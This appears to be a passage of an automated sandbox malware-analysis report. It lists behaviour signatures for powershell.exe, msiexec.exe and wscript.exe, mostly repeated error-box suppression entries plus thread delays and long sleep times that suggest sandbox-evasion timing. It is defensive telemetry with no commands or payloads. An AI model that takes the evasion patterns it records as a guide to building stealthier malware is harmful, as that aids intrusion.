              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599782Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599662Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599290Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599186Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599047Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598390Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598278Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597939Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597813Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597587Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597264Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596586Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596475Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596356Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595825Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594719Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594282Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594157Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594032Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593907Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593776Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593661Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593531Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593203Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593032Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4806Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7753Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1815Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 6204Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 3488Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -24903104499507879s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1796Thread sleep count: 3825 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -599891s >= -30000sJump to behavior
